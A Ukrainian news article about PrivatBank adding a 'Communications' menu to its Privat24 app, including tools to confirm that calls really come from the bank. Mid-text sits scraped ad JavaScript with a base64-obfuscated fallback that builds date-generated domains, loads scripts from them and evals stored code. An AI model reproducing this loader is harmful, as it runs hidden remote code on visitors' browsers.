«Переконатися, що дзвонять із банку»: Приватбанк запустив важливу функцію

ПриватБанк запустив оновлену версію свого мобільного додатку Приват24 з новим єдиним меню «Комунікації». За допомогою цього нового меню користувачі тепер можуть зв’язатися з банком за допомогою різних каналів зв’язку, таких як «Допомога онлайн», месенджери або прямий дзвінок до банку.

Інформацію про це повідомила прес-служба ПриватБанку, пише Акцент.

Нове меню «Комунікації» надає користувачам наступні можливості:

Допомога онлайн: Цей розділ призначений для тих, хто бажає оперативно вирішити свою проблему прямо у додатку.Написати в Viber або Telegram: Тепер клієнти можуть зв’язатися з представниками банку через популярні месенджери — Viber або Telegram.Дзвінок через Приват24: Програма Приват24 дозволяє здійснювати дзвінки безпосередньо з додатку.

Крім того, у разі, якщо клієнт раніше звертався до банку щодо проблем, в меню «Історія заявок» буде доступна повна інформація про ці звернення. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Триває запис: у Запоріжжі ВПО можуть отримати безкоштовні окуляри (УМОВИ) Доступні заходи

У зв’язку з питаннями безпеки, ПриватБанк також впровадив наступні заходи:

Дзвінки: Якщо користувачам потрібно переконатися, що дзвінок є дійсною ініціативою ПриватБанку та співробітники банку представилися, вони можуть самостійно перевірити телефонний номер та переглянути історію вхідних дзвінків від банку.Повідомлення про шахрайство: Користувачі можуть повідомити про випадки шахрайства, якщо було отримано підозрілі дзвінки, які не походять від ПриватБанку.

У меню «Комунікації» також доступні додаткові контактні телефонні номери банку в розділі «Контакти», а також актуальна інформація про відділення, банкомати та термінали у розділі «Карта відділень».

Ці нові функції додатку Приват24 дозволяють клієнтам зручно зв’язуватися з банком та забезпечують додаткові можливості контролю та безпеки при спілкуванні з представниками ПриватБанку. (adsbygoogle = window.adsbygoogle || []).push({});

Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/perekonatisya-shho-dzvonyat-iz-banku-privatbank-zapustiv-vazhlivu-funktsiyu/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top